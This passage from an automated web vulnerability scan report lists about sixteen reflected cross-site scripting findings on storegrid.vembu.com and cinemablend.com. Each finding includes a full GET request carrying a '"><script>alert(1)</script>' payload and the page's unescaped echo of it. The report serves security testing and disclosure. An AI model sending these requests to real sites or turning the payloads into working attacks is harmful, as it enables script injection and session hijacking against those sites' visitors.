Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:52 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 25244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Microsoft Sharepoint Server Backups - Vembu StoreGrid Backup Software</title
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/sharepoint-backup.php?a1a0c"><script>alert(1)</script>83e240a15b4=1" name="next-url" type="hidden">
...[SNIP]...

4.387. http://storegrid.vembu.com/online-backup/storegrid-screenshots.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/storegrid-screenshots.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74e98"><script>alert(1)</script>73b4bd481d6 was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/storegrid-screenshots.php?ct=274e98"><script>alert(1)</script>73b4bd481d6 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://storegrid.vembu.com/online-backup/computer-backup.php
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:15 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 16790

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>StoreGrid Screenshots | Remote Backup software for MSPs, VARs, Service Pr
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/storegrid-screenshots.php?ct=274e98"><script>alert(1)</script>73b4bd481d6" name="next-url" type="hidden">
...[SNIP]...

4.388. http://storegrid.vembu.com/online-backup/storegrid-screenshots.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/storegrid-screenshots.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a105"><script>alert(1)</script>76b4c792cec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/storegrid-screenshots.php?ct=2&7a105"><script>alert(1)</script>76b4c792cec=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://storegrid.vembu.com/online-backup/computer-backup.php
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:33 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 26458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>StoreGrid Screenshots | Remote Backup software for MSPs, VARs, Service Pr
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/storegrid-screenshots.php?ct=2&7a105"><script>alert(1)</script>76b4c792cec=1" name="next-url" type="hidden">
...[SNIP]...

4.389. http://storegrid.vembu.com/online-backup/support-plans-sp.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/support-plans-sp.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3f9"><script>alert(1)</script>8b301baff8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/support-plans-sp.php?bc3f9"><script>alert(1)</script>8b301baff8d=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:08:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 47087

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Vembu StoreGrid . Online Backup Software | Premium Support Plans</title>
<me
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/support-plans-sp.php?bc3f9"><script>alert(1)</script>8b301baff8d=1" name="next-url" type="hidden">
...[SNIP]...

4.390. http://storegrid.vembu.com/online-backup/troubleshooting.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/troubleshooting.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96d2a"><script>alert(1)</script>e6b416bee78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/troubleshooting.php?96d2a"><script>alert(1)</script>e6b416bee78=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:39:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 87084

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Remote Online Backup Software for Service Providers, SMBs &amp; ROBOs</ti
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/troubleshooting.php?96d2a"><script>alert(1)</script>e6b416bee78=1" name="next-url" type="hidden">
...[SNIP]...

4.391. http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php [ct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/vss-volume-shadow-copy-service.php

Issue detail

The value of the ct request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2295"><script>alert(1)</script>3af2fd9b54f was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/vss-volume-shadow-copy-service.php?ct=2f2295"><script>alert(1)</script>3af2fd9b54f HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:11:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 26919

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Vembu StoreGrid: External Disk Backup</title>
<meta http-equiv="Content-
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php?ct=2f2295"><script>alert(1)</script>3af2fd9b54f" name="next-url" type="hidden">
...[SNIP]...

4.392. http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /online-backup/vss-volume-shadow-copy-service.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8defd"><script>alert(1)</script>8b6bb3d7edf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-backup/vss-volume-shadow-copy-service.php?ct=2&8defd"><script>alert(1)</script>8b6bb3d7edf=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:11:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 26922

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Vembu StoreGrid: External Disk Backup</title>
<meta http-equiv="Content-
...[SNIP]...
<input value="http://storegrid.vembu.com/online-backup/vss-volume-shadow-copy-service.php?ct=2&8defd"><script>alert(1)</script>8b6bb3d7edf=1" name="next-url" type="hidden">
...[SNIP]...

4.393. http://storegrid.vembu.com/search-results.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /search-results.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e92e0"><script>alert(1)</script>164607dab97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search-results.php?e92e0"><script>alert(1)</script>164607dab97=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:00:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 21353

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Vembu StoreGrid . Network Backup Software | Site Search Results </title>
...[SNIP]...
<input value="http://storegrid.vembu.com/search-results.php?e92e0"><script>alert(1)</script>164607dab97=1" name="next-url" type="hidden">
...[SNIP]...

4.394. http://storegrid.vembu.com/sitemap.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc8d"><script>alert(1)</script>e731e1c6546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap.php?ebc8d"><script>alert(1)</script>e731e1c6546=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://storegrid.vembu.com/online-backup/computer-backup.php
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:42:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 38769

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Sitemap | Online Backup software for MSPs, VARs, Service Providers, SMBs &am
...[SNIP]...
<input value="http://storegrid.vembu.com/sitemap.php?ebc8d"><script>alert(1)</script>e731e1c6546=1" name="next-url" type="hidden">
...[SNIP]...

4.395. http://storegrid.vembu.com/technology-partners.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /technology-partners.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3debd"><script>alert(1)</script>516d9252024 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology-partners.php?3debd"><script>alert(1)</script>516d9252024=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:53:20 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 27046

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Vembu StoreGrid . Computer Backup Software | People</title>
<meta http-e
...[SNIP]...
<input value="http://storegrid.vembu.com/technology-partners.php?3debd"><script>alert(1)</script>516d9252024=1" name="next-url" type="hidden">
...[SNIP]...

4.396. http://storegrid.vembu.com/video.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /video.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a14"><script>alert(1)</script>efa2a13eb3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video.php?37a14"><script>alert(1)</script>efa2a13eb3e=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; __utmb=230392542.2.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 06:54:49 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 29316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Quick Videos | StoreGrid Offsite Backup Software</title>
<meta http-equiv="C
...[SNIP]...
<input value="http://storegrid.vembu.com/video.php?37a14"><script>alert(1)</script>efa2a13eb3e=1" name="next-url" type="hidden">
...[SNIP]...

4.397. http://storegrid.vembu.com/whitepapers.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://storegrid.vembu.com
Path:   /whitepapers.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be354"><script>alert(1)</script>ca398f65c8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /whitepapers.php?be354"><script>alert(1)</script>ca398f65c8c=1 HTTP/1.1
Host: storegrid.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_pkh3a_k=; phpbb3_pkh3a_sid=a66d02f6e3e52474fa362149aeba78eb; __utmz=230392542.1289802285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=0863316e1ff6fea151f48ddf78280da4; __utma=230392542.54655962.1289802285.1289802285.1289802285.1; __utmc=230392542; phpbb3_pkh3a_u=1; __utmb=230392542.3.10.1289802285; vhbsc=3vkq98e8n43m6gnh0u2qf9sff6;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 08:48:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 22481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Whitepapers | StoreGrid Data Backup Software</title>
<meta http-equiv="Conte
...[SNIP]...
<input value="http://storegrid.vembu.com/whitepapers.php?be354"><script>alert(1)</script>ca398f65c8c=1" name="next-url" type="hidden">
...[SNIP]...

4.398. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cinemablend.com
Path:   /technology/Google-s-Online-Storage-Services-Go-Live-5780.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5701c"><script>alert(1)</script>925f2700ea7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/Google-s-Online-Storage-Services-Go-Live-5780.html5701c"><script>alert(1)</script>925f2700ea7 HTTP/1.1
Host: www.cinemablend.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:21:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=30c27339fba762cd24796d13e3a22f7f; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Google's Online Sto
...[SNIP]...
<input type="hidden" name="return_to" value="/technology/Google-s-Online-Storage-Services-Go-Live-5780.html5701c"><script>alert(1)</script>925f2700ea7" />
...[SNIP]...

4.399. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cinemablend.com
Path:   /technology/Google-s-Online-Storage-Services-Go-Live-5780.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40902"><script>alert(1)</script>fb21da24978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/Google-s-Online-Storage-Services-Go-Live-5780.html?40902"><script>alert(1)</script>fb21da24978=1 HTTP/1.1
Host: www.cinemablend.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:21:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e61f69bf4eb771dc42f85c0ee1294810; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Google's Online Sto
...[SNIP]...
<input type="hidden" name="return_to" value="/technology/Google-s-Online-Storage-Services-Go-Live-5780.html?40902"><script>alert(1)</script>fb21da24978=1" />
...[SNIP]...

4.400. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cinemablend.com
Path:   /technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a9e1"><script>alert(1)</script>124fecda8a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/Google-s-Online-Storage-Services-Go-Live-5780.html1a9e1"><script>alert(1)</script>124fecda8a2/x22 HTTP/1.1
Host: www.cinemablend.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:21:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=10ede89083e2557e7155f7c343f6560b; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Google's Online Sto
...[SNIP]...
<input type="hidden" name="return_to" value="/technology/Google-s-Online-Storage-Services-Go-Live-5780.html1a9e1"><script>alert(1)</script>124fecda8a2/x22" />
...[SNIP]...

4.401. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cinemablend.com
Path:   /technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da162"><script>alert(1)</script>cdbaa285fdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22da162"><script>alert(1)</script>cdbaa285fdf HTTP/1.1
Host: www.cinemablend.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:21:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c231d4bbc9b2793310dc03e1cfc4524d; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Google's Online Sto
...[SNIP]...
<input type="hidden" name="return_to" value="/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22da162"><script>alert(1)</script>cdbaa285fdf" />
...[SNIP]...

4.402. http://www.cinemablend.com/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cinemablend.com
Path:   /technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8922a"><script>alert(1)</script>a92afe48dc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

